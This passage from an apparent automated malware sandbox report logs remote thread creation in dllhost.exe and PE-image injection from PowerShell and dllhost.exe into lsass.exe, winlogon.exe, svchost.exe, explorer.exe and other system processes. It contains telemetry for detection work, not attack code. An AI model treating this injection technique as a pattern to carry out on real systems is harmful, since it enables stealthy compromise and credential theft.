Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: E5E22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4EE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC522EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC552EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 65092EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0522EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 15D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F2842EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: D6712EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 37402EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E3D52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FE072EBC

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
